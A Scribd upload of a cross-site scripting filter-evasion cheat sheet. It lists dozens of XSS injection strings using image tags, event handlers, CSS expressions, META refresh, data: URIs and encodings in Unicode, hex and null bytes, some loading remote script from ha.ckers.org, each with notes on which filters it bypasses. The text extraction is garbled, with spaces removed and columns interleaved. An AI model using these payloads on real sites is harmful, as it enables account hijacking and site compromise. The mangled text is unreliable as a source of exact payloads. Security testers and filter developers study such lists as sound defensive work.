Scribd
Upload
447 views

XSS Cross Site Scripting Cheat Sheet

The document contains various techniques for testing cross-site scripting (XSS) vulnerabilities, including strings that can be injected to potentially execute JavaScript if a site is vulnerable. Some examples include encoding JavaScript code in image tags, using Unicode encoding, and breaking up the code with special characters like tabs. The techniques target different browsers and aim to evade various XSS filters.

Uploaded by

srilankanonline
Copyright
© Attribution Non-Commercial (BY-NC)
Available Formats
Download as PDF, TXT or read online on Scribd
447 views

XSS Cross Site Scripting Cheat Sheet

The document contains various techniques for testing cross-site scripting (XSS) vulnerabilities, including strings that can be injected to potentially execute JavaScript if a site is vulnerable. Some examples include encoding JavaScript code in image tags, using Unicode encoding, and breaking up the code with special characters like tabs. The techniques target different browsers and aim to evade various XSS filters.

Uploaded by

srilankanonline
Copyright
© Attribution Non-Commercial (BY-NC)
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 18

XSSlocator.Injectthisstring,andinmostcasesw hereascriptisvulnerablew ithnospecialXSS vectorrequirementsthew ord"XSS"w illpopup.UsetheURLencodingcalculatorbelow to encodetheentirestring.Tip:ifyou'reinarushandneedtoquicklycheckapage,oftentimes injectingthedepreciated"<PLAINTEXT>"tagw illbeenoughtochecktoseeifsomethingis vulnerabletoXSSbymessinguptheoutputappreciably: 'alert(String.fromCharCode(88,83,83))//\'alert(String.fro mCharCode(88,83,83))//"alert(String.fromCharCode(88, 83,83))//\"alert(String.fromCharCode(88,83,83))// ></SCRIPT>">'><SCRIPT>alert(String.

fromCharCode(88, Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02] 83,83))</SCRIPT>

XSSlocator2.Ifyoudon'thavemuchspaceandknow thereisnovulnerableJavaScriptonthe page,thisstringisanicecompactXSSinjectioncheck.View sourceafterinjectingitandlookfor <XSSverses&ltXSStoseeifitisvulnerable: ''!"<XSS>=&{()}

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

Nofilterevasion.ThisisanormalXSSJavaScriptinjection,andmostlikelytogetcaughtbutI suggesttryingitfirst(thequotesarenotrequiredinanymodernbrow sersotheyareomitted here): <SCRIPTSRC=http://ha.ckers.org/xss.js></SCRIPT>

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

ImageXSSusingtheJavaScriptdirective(IE7.0doesn'tsupporttheJavaScriptdirectiveincontext ofanimage,butitdoesinothercontexts,butthefollow ingshow theprinciplesthatw ouldw orkin othertagsasw ellI'llprobablyrevisethisatalaterdate): <IMGSRC="javascript:alert('XSS')">

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

Noquotesandnosemicolon: <IMGSRC=javascript:alert('XSS')>

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

CaseinsensitiveXSSattackvector: <IMGSRC=JaVaScRiPt:alert('XSS')>

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

HTMLentities(thesemicolonsarerequiredforthistow ork): <IMGSRC=javascript:alert(&quotXSS&quot)>

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

Graveaccentobfuscation(Ifyouneedtousebothdoubleandsinglequotesyoucanuseagrave accenttoencapsulatetheJavaScriptstringthisisalsousefulbecauselotsofcrosssite scriptingfiltersdon'tknow aboutgraveaccents): <IMGSRC=`javascript:alert("RSnakesays,'XSS'")`>

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

MalformedIMGtags.OriginallyfoundbyBegeek(butcleanedupandshortenedtow orkinall brow sers),thisXSSvectorusestherelaxedrenderingenginetocreateourXSSvectorw ithinan IMGtagthatshouldbeencapsulatedw ithinquotes.Iassumethisw asoriginallymeanttocorrect sloppycoding.Thisw ouldmakeitsignificantlymoredifficulttocorrectlyparseapartanHTMLtag: <IMG"""><SCRIPT>alert("XSS")</SCRIPT>">

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

fromCharCode(ifnoquotesofanykindareallow edyoucaneval()afromCharCodeinJavaScript tocreateanyXSSvectoryouneed).Clickheretobuildyourow n(thankstoHannesLeopold): <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

UTF8Unicodeencoding(alloftheXSSexamplesthatuseajavascript:directiveinsideofan<IMG tagw illnotw orkinFirefoxorNetscape8.1+intheGeckorenderingenginemode).UsetheXSS

calculatorformoreinformation: <IMG SRC=&#106&#97&#118&#97&#115&#99&#114&#1 05&#112&#116&#58&#97&#108&#101&#114&#11 6&#40&#39&#88&#83&#83&#39&#41> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

LongUTF8Unicodeencodingw ithoutsemicolons(thisisofteneffectiveinXSSthatattemptsto lookfor"&#XX",sincemostpeopledon'tknow aboutpaddingupto7numericcharacterstotal). Thisisalsousefulagainstpeoplew hodecodeagainststringslike$tmp_string=~ s/.*\&#(\d+).*/$1/w hichincorrectlyassumesasemicolonisrequiredtoterminateahtmlencoded string(I'veseenthisinthew ild): <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0 000115&#0000099&#0000114&#0000105&#0000112&# 0000116&#0000058&#0000097&#0000108&#0000101& Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02] #0000114&#0000116&#0000040&#0000039&#0000088 &#0000083&#0000083&#0000039&#0000041> Hexencodingw ithoutsemicolons(thisisalsoaviableXSSattackagainsttheabovestring $tmp_string=~s/.*\&#(\d+).*/$1/w hichassumesthatthereisanumericcharacterfollow ingthe poundsymbolw hichisnottruew ithhexHTMLcharacters).UsetheXSScalculatorformore information: <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x 69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74& #x28&#x27&#x58&#x53&#x53&#x27&#x29> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

Embeddedtabtobreakupthecrosssitescriptingattack: <IMGSRC="jav ascript:alert('XSS')">

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

EmbeddedencodedtabtobreakupXSS: <IMGSRC="jav&#x09ascript:alert('XSS')">

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

Embedednew linetobreakupXSS.Somew ebsitesclaimthatanyofthechars0913(decimal) w illw orkforthisattack.Thatisincorrect.Only09(horizontaltab),10(new line)and13(carriage return)w ork.Seetheasciichartformoredetails.Thefollow ingfourXSSexamplesillustratethis

vector: <IMGSRC="jav&#x0Aascript:alert('XSS')">

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

EmbeddedcarriagereturntobreakupXSS(Note:w iththeaboveIammakingthesestringslonger thantheyhavetobebecausethezeroscouldbeomitted.OftenI'veseenfiltersthatassumethe hexanddecencodinghastobetw oorthreecharacters.Therealruleis17characters.): <IMGSRC="jav&#x0Dascript:alert('XSS')">

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

MultilineInjectedJavaScriptusingASCIIcarriagereturns(sameasaboveonlyamoreextreme exampleofthisXSSvector)thesearenotspacesjustoneofthethreecharactersasdescribed above: <IMG SRC = " Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02] j a v a NullbreaksupJavaScriptdirective.Okay,Ilied,nullcharsalsow orkasXSSvectorsbutnotlike s c above,youneedtoinjectthemdirectlyusingsomethinglikeBurpProxyoruse%00intheURL r stringorifyouw anttow riteyourow ninjectiontoolyoucaneitherusevim(^V^@w illproducea i p null)orthefollow ingprogramtogenerateitintoatextfile.Okay,Iliedagain,olderversionsof t Opera(circa7.11onWindow s)w erevulnerabletooneadditionalchar173(thesofthypen : a controlchar).Butthenullchar%00ismuchmoreusefulandhelpedmebypasscertainrealw orld l filtersw ithavariationonthisexample: e r perle'print"<IMGSRC=java\0script:alert(\"XSS\")>"'> t out ( ' X Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02] S S ' ) Nullbreaksupcrosssitescriptingvector.Hereisalittleknow nXSSattackvectorusingnull " characters.YoucanactuallybreakuptheHTMLitselfusingthesamenullsasshow nabove.I've > seenthisvectorbypasssomeofthemostrestrictiveXSSfilterstodate: perle'print"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>"'> out Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

SpacesandmetacharsbeforetheJavaScriptinimagesforXSS(thisisusefulifthepattern matchdoesn'ttakeintoaccountspacesinthew ord"javascript:"w hichiscorrectsincethat w on'trenderandmakesthefalseassumptionthatyoucan'thaveaspacebetw eenthequote andthe"javascript:"keyw ord.Theactualrealityisyoucanhaveanycharfrom132indecimal): <IMGSRC="&#14javascript:alert('XSS')">

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

NonalphanondigitXSS.WhileIw asreadingtheFirefoxHTMLparserIfoundthatitassumesa nonalphanondigitisnotvalidafteranHTMLkeyw ordandthereforconsidersittobea w hitespaceornonvalidtokenafteranHTMLtag.TheproblemisthatsomeXSSfiltersassume thatthetagtheyarelookingforisbrokenupbyw hitespace.Forexample"<SCRIPT\s"!= "<SCRIPT/XSS\s": <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

Nonalphanondigitpart2XSS.yaw nmothbroughtmyattentiontothisvector,basedonthesame ideaasabove,how ever,Iexpandedonit,usingmyfuzzer.TheGeckorenderingengineallow s foranycharacterotherthanletters,numbersorencapsulationchars(likequotes,anglebrackets, etc...)betw eentheeventhandlerandtheequalssign,makingiteasiertobypasscrosssite scriptingblocks.Notethatthisalsoappliestothegraveaccentcharasseenhere: <BODYonload!#$%&()*~+_.,:?@[/|\]^`=alert("XSS")>

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

Nonalphanondigitpart3XSS.YairAmitbroughtthistomyattentionthatthereisslightlydifferent behaviorbetw eentheIEandGeckorenderingenginesthatallow sjustaslashbetw eenthetag andtheparameterw ithnospaces.Thiscouldbeusefulifthesystemdoesnotallow spaces. <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

Extraneousopenbrackets.SubmittedbyFranzSedlmaier,thisXSSvectorcoulddefeatcertain

detectionenginesthatw orkbyfirstusingmatchingpairsofopenandcloseanglebracketsand thenbydoingacomparisonofthetaginside,insteadofamoreefficientalgorythmlikeBoyer Moorethatlooksforentirestringmatchesoftheopenanglebracketandassociatedtag(postde obfuscation,ofcourse).Thedoubleslashcommentsouttheendingextraneousbracketto supressaJavaScripterror: <<SCRIPT>alert("XSS")//<</SCRIPT>

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

Noclosingscripttags.InFirefoxandNetscape8.1intheGeckorenderingenginemodeyoudon't actuallyneedthe"></SCRIPT>"portionofthisCrossSiteScriptingvector.Firefoxassumesit's safetoclosetheHTMLtagandaddclosingtagsforyou.How thoughtful!Unlikethenextone, w hichdoesn'teffectFirefox,thisdoesnotrequireanyadditionalHTMLbelow it.Youcanadd quotesifyouneedto,butthey'renotneededgenerally,althoughbew are,Ihavenoideaw hatthe HTMLw illenduplookinglikeoncethisisinjected: <SCRIPTSRC=http://ha.ckers.org/xss.js?<B>

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

Protocolresolutioninscripttags.Thisparticularvariantw assubmittedbyukaszPilorzandw as basedpartiallyoffofOzh'sprotocolresolutionbypassbelow .Thiscrosssitescriptingexample w orksinIE,NetscapeinIErenderingmodeandOperaifyouaddina</SCRIPT>tagattheend. How ever,thisisespeciallyusefulw herespaceisanissue,andofcourse,theshorteryour domain,thebetter.The".j"isvalid,regardlessoftheencodingtypebecausethebrow serknow s itincontextofaSCRIPTtag. <SCRIPTSRC=//ha.ckers.org/.j>

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

HalfopenHTML/JavaScriptXSSvector.UnlikeFirefoxtheIErenderingenginedoesn'taddextra datatoyourpage,butitdoesallow thejavascript:directiveinimages.Thisisusefulasavector becauseitdoesn'trequireacloseanglebracket.ThisassumesthereisanyHTMLtagbelow w hereyouareinjectingthiscrosssitescriptingvector.Eventhoughthereisnoclose">"tagthe tagsbelow itw illcloseit.Anote:thisdoesmessuptheHTML,dependingonw hatHTMLis beneathit.Itgetsaroundthefollow ingNIDSregex:/((\%3D)|(=))[^\n]*((\%3C)|<)[^\n]+((\%3E)|>)/ becauseitdoesn'trequiretheend">".Asasidenote,thisw asalsoaffectiveagainstarealw orld XSSfilterIcameacrossusinganopenended<IFRAMEtaginsteadofan<IMGtag:

<IMGSRC="javascript:alert('XSS')"

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

Doubleopenanglebrackets.ThisisanoddonethatStevenChristeybroughttomyattention.At firstImisclassifiedthisasthesameXSSvectorasabovebutit'ssurprisinglydifferent.Usingan openanglebracketattheendofthevectorinsteadofacloseanglebracketcausesdifferent behaviorinNetscapeGeckorendering.Withoutit,Firefoxw illw orkbutNetscapew on't: <iframesrc=http://ha.ckers.org/scriptlet.html<

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

XSSw ithnosinglequotesordoublequotesorsemicolons: <SCRIPT>a=/XSS/ alert(a.source)</SCRIPT> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

EscapingJavaScriptescapes.Whentheapplicationisw rittentooutputsomeuserinformation insideofaJavaScriptlikethefollow ing:<SCRIPT>vara="$ENV{QUERY_STRING}"</SCRIPT>and youw anttoinjectyourow nJavaScriptintoitbuttheserversideapplicationescapescertain quotesyoucancircumventthatbyescapingtheirescapecharacter.Whenthisisgetsinjectedit w illread<SCRIPT>vara="\\"alert('XSS')//"</SCRIPT>w hichendsupunescapingthedouble quoteandcausingtheCrossSiteScriptingvectortofire.TheXSSlocatorusesthismethod.: \"alert('XSS')//

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

Endtitletag.ThisisasimpleXSSvectorthatcloses<TITLE>tags,w hichcanencapsulatethe maliciouscrosssitescriptingattack: </TITLE><SCRIPT>alert("XSS")</SCRIPT>

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

INPUTimage:

<INPUTTYPE="IMAGE"SRC="javascript:alert('XSS')">

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

BODYimage: <BODYBACKGROUND="javascript:alert('XSS')">

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

BODYtag(Ilikethismethodbecauseitdoesn'trequireusinganyvariantsof"javascript:"or "<SCRIPT..."toaccomplishtheXSSattack).DanCrow leyadditionallynotedthatyoucanputa spacebeforetheequalssign("onload="!="onload="): <BODYONLOAD=alert('XSS')>

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

EventHandlersthatcanbeusedinsimilarXSSattackstotheoneabove(thisisthemost comprehensivelistonthenet,atthetimeofthisw riting).PleasenoteIhaveexcludedbrow ser supportfromthissectionbecauseeachonemayhavedifferentresultsindifferentbrow sers. ThankstoReneLedosquetfortheHTML+TIMEupdates: 1. FSCommand()(attackercanusethisw hen executedfromw ithinanembeddedFlashobject) 2. onAbort()(w henuserabortstheloadingofan image) 3. onActivate()(w henobjectissetastheactive element) 4. onAfterPrint()(activatesafteruserprintsor IMGDynsrc: preview sprintjob) 5. onAfterUpdate()(activatesondataobjectafter <IMGDYNSRC="javascript:alert('XSS')"> updatingdatainthesourceobject) 6. onBeforeActivate()(firesbeforetheobjectisset astheactiveelement) Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02] 7. onBeforeCopy()(attackerexecutestheattack stringrightbeforeaselectioniscopiedtotheclipboard attackerscandothisw iththeexecCommand("Copy") function) 8. onBeforeCut()(attackerexecutestheattackstring IMGlow src: rightbeforeaselectioniscut) <IMGLOWSRC="javascript:alert('XSS')"> 9. onBeforeDeactivate()(firesrightafterthe activeElementischangedfromthecurrentobject) 10. onBeforeEditFocus()(Firesbeforeanobject containedinaneditableelemententersaUIactivated Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02] stateorw henaneditablecontainerobjectiscontrol selected) 11. onBeforePaste()(userneedstobetrickedinto pastingorbeforcedintoitusingthe

BGSOUND: <BGSOUNDSRC="javascript:alert('XSS')">

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

&JavaScriptincludes(w orksinNetscape4.x): <BRSIZE="&{alert('XSS')}">

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02][NS4]

LAYER(alsoonlyw orksinNetscape4.x) <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02][NS4]

STYLEsheet: <LINKREL="stylesheet"HREF="javascript:alert('XSS')">

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

Remotestylesheet(usingsomethingassimpleasaremotestylesheetyoucanincludeyourXSS asthestyleparametercanberedefinedusinganembeddedexpression.)Thisonlyw orksinIE andNetscape8.1+inIErenderingenginemode.Noticethatthereisnothingonthepagetoshow thatthereisincludedJavaScript.Note:Withalloftheseremotestylesheetexamplestheyusethe bodytag,soitw on'tw orkunlessthereissomecontentonthepageotherthanthevectoritself, soyou'llneedtoaddasinglelettertothepagetomakeitw orkifit'sanotherw iseblankpage: <LINKREL="stylesheet" HREF="http://ha.ckers.org/xss.css"> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

Remotestylesheetpart2(thisw orksthesameasabove,butusesa<STYLE>taginsteadofa <LINK>tag).Aslightvariationonthisvectorw asusedtohackGoogleDesktop.Asasidenote, youcanremovetheend</STYLE>tagifthereisHTMLimmediatelyafterthevectortocloseit. Thisisusefulifyoucannothaveeitheranequalssignoraslashinyourcrosssitescripting attack,w hichhascomeupatleastonceintherealw orld:

<STYLE>@import'http://ha.ckers.org/xss.css'</STYLE>

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

Remotestylesheetpart3.Thisonlyw orksinOpera8.0(nolongerin9.x)butisfairlytricky. AccordingtoRFC2616settingalinkheaderisnotpartoftheHTTP1.1spec,how eversome brow sersstillallow it(likeFirefoxandOpera).ThetrickhereisthatIamsettingaheader(w hich isbasicallynodifferentthanintheHTTPheadersayingLink:<http://ha.ckers.org/xss.css> REL=stylesheet)andtheremotestylesheetw ithmycrosssitescriptingvectorisrunningthe JavaScript,w hichisnotsupportedinFireFox: <METAHTTPEQUIV="Link" Content="<http://ha.ckers.org/xss.css> REL=stylesheet"> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

Remotestylesheetpart4.Thisonlyw orksinGeckorenderingenginesandw orksbybindingan XULfiletotheparentpage.IthinktheironyhereisthatNetscapeassumesthatGeckoissafer andthereforisvulnerabletothisforthevastmajorityofsites: <STYLE>BODY{moz binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</ST YLE> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

Localhtcfile.Thisisalittledifferentthantheabovetw ocrosssitescriptingvectorsbecauseit usesan.htcfilew hichmustbeonthesameserverastheXSSvector.Theexamplefilew orksby pullingintheJavaScriptandrunningitaspartofthestyleattribute: <XSSSTYLE="behavior:url(xss.htc)">

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

Liststyleimage.Fairlyesotericissuedealingw ithembeddingimagesforbulletedlists.Thisw ill onlyw orkintheIErenderingenginebecauseoftheJavaScriptdirective.Notaparticularlyuseful crosssitescriptingvector: <STYLE>li{liststyleimage: url("javascript:alert('XSS')")}</STYLE><UL><LI>XSS Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

VBscriptinanimage: <IMGSRC='vbscript:msgbox("XSS")'>

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

Mocha(olderversionsofNetscapeonly): <IMGSRC="mocha:[code]">

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02][NS4]

Livescript(olderversionsofNetscapeonly): <IMGSRC="livescript:[code]">

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02][NS4]

USASCIIencoding(foundbyKurtHuw ig).ThisusesmalformedASCIIencodingw ith7bits insteadof8.ThisXSSmaybypassmanycontentfiltersbutonlyw orksifthehosttransmitsinUS ASCIIencoding,orifyousettheencodingyourself.Thisismoreusefulagainstw ebapplication firew allcrosssitescriptingevasionthanitisserversidefilterevasion.ApacheTomcatistheonly know nserverthattransmitsinUSASCIIencoding.Ihighlysuggestanyoneinterestedinalternate encodingissueslookatmycharsetsissuespage: scriptalert(XSS)/script

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02][NS4]

META(theoddthingaboutmetarefreshisthatitdoesn'tsendareferrerintheheadersoitcan beusedforcertaintypesofattacksw hereyouneedtogetridofreferringURLs): <METAHTTPEQUIV="refresh" CONTENT="0url=javascript:alert('XSS')"> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

METAusingdata:directiveURLscheme.Thisisnicebecauseitalsodoesn'thaveanythingvisibly thathasthew ordSCRIPTortheJavaScriptdirectiveinit,becauseitutilizesbase64encoding. PleaseseeRFC2397formoredetailsorgohereorheretoencodeyourow n.Youcanalsouse theXSScalculatorbelow ifyoujustw anttoencoderaw HTMLorJavaScriptasithasaBase64

encodingmethod: <METAHTTPEQUIV="refresh" CONTENT="0url=data:text/htmlbase64,PHNjcmlw dD5hb GVydCgnWFNTJyk8L3Njcmlw dD4K"> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

METAw ithadditionalURLparameter.Ifthetargetw ebsiteattemptstoseeiftheURLcontains "http://"atthebeginningyoucanevadeitw iththefollow ingtechnique(SubmittedbyMoritz Naumann): <METAHTTPEQUIV="refresh"CONTENT="0 URL=http://URL=javascript:alert('XSS')"> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

IFRAME(ififramesareallow edtherearealotofotherXSSproblemsasw ell): <IFRAMESRC="javascript:alert('XSS')"></IFRAME>

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

FRAME(frameshavethesamesortsofXSSproblemsasiframes): <FRAMESET><FRAME SRC="javascript:alert('XSS')"></FRAMESET> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

TABLE(w how ouldhavethoughttablesw ereXSStargets...exceptme,ofcourse): <TABLEBACKGROUND="javascript:alert('XSS')">

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

TD(justlikeabove,TD'sarevulnerabletoBACKGROUNDscontainingJavaScriptXSSvectors): <TABLE><TDBACKGROUND="javascript:alert('XSS')">

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

DIVbackgroundimage:

<DIVSTYLE="backgroundimage: url(javascript:alert('XSS'))"> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

DIVbackgroundimagew ithunicodedXSSexploit(thishasbeenmodifiedslightlytoobfuscatethe urlparameter).Theoriginalvulnerabilityw asfoundbyRenaudLifchitzasavulnerabilityinHotmail: <DIVSTYLE="background image:\0075\0072\006C\0028'\006a\0061\0076\0061\00 73\0063\0072\0069\0070\0074\003a\0061\006c\0065\00 72\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

DIVbackgroundimageplusextracharacters.IbuiltaquickXSSfuzzertodetectanyerroneous charactersthatareallow edaftertheopenparenthesisbutbeforetheJavaScriptdirectiveinIE andNetscape8.1insecuresitemode.Theseareindecimalbutyoucanincludehexandadd paddingofcourse.(Anyofthefollow ingcharscanbeused:132,34,39,160,81928.13,12288, 65279): <DIVSTYLE="backgroundimage: url(&#1javascript:alert('XSS'))"> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

DIVexpressionavariantofthisw aseffectiveagainstarealw orldcrosssitescriptingfilter usinganew linebetw eenthecolonand"expression": <DIVSTYLE="w idth:expression(alert('XSS'))">

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

STYLEtagsw ithbrokenupJavaScriptforXSS(thisXSSattimessendsIEintoaninfiniteloopof alerts): <STYLE>@im\port'\ja\vasc\ript:alert("XSS")'</STYLE>

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

STYLEattributeusingacommenttobreakupexpression(ThankstoRomanIvanovforthisone): <IMGSTYLE="xss:expr/*XSS*/ession(alert('XSS'))">

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

AnonymousHTMLw ithSTYLEattribute(IE6.0andNetscape8.1+inIErenderingenginemode don'treallycareiftheHTMLtagyoubuildexistsornot,aslongasitstartsw ithanopenangle bracketandaletter): <XSSSTYLE="xss:expression(alert('XSS'))">

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

IMGSTYLEw ithexpression(thisisreallyahybridoftheaboveXSSvectors,butitreallydoes show how hardSTYLEtagscanbetoparseapart,likeabovethiscansendIEintoaloop): exp/*<ASTYLE='no\xss:noxss("*//*") xss:&#101x&#x2F*XSS*//*/*/pression(alert("XSS"))'> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

STYLEtag(OlderversionsofNetscapeonly): <STYLETYPE="text/javascript">alert('XSS')</STYLE>

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02][NS4]

STYLEtagusingbackgroundimage: <STYLE>.XSS{background image:url("javascript:alert('XSS')")}</STYLE><A CLASS=XSS></A> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

STYLEtagusingbackground: <STYLE type="text/css">BODY{background:url("javascript:alert( 'XSS')")}</STYLE> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

Dow nlevelHiddenblock(onlyw orksinIE5.0andlaterandNetscape8.1inIErenderingengine mode).Somew ebsitesconsideranythinginsideacommentblocktobesafeandthereforedoes notneedtoberemoved,w hichallow sourCrossSiteScriptingvector.Orthesystemcouldadd commenttagsaroundsomethingtoattempttorenderitharmless.Asw ecansee,thatprobably

w ouldn'tdothejob: <![ifgteIE4]> <SCRIPT>alert('XSS')</SCRIPT> <![endif]> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

BASEtag.WorksinIEandNetscape8.1insafemode.Youneedthe//tocommentoutthenext characterssoyouw on'tgetaJavaScripterrorandyourXSStagw illrender.Also,thisrelieson thefactthatthew ebsiteusesdynamicallyplacedimageslike"images/image.jpg"ratherthanfull paths.Ifthepathincludesaleadingforw ardslashlike"/images/image.jpg"youcanremoveone slashfromthisvector(aslongastherearetw otobeginthecommentthisw illw ork): <BASEHREF="javascript:alert('XSS')//">

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

OBJECTtag(iftheyallow objects,youcanalsoinjectviruspayloadstoinfecttheusers,etc.and samew iththeAPPLETtag).ThelinkedfileisactuallyanHTMLfilethatcancontainyourXSS: <OBJECTTYPE="text/xscriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

UsinganOBJECTtagyoucanembedXSSdirectly(thisisunverifiedsonobrow sersupportis added): <OBJECTclassid=clsid:ae24fdae03c611d18b76 0080c744f389><paramname=url value=javascript:alert('XSS')></OBJECT>

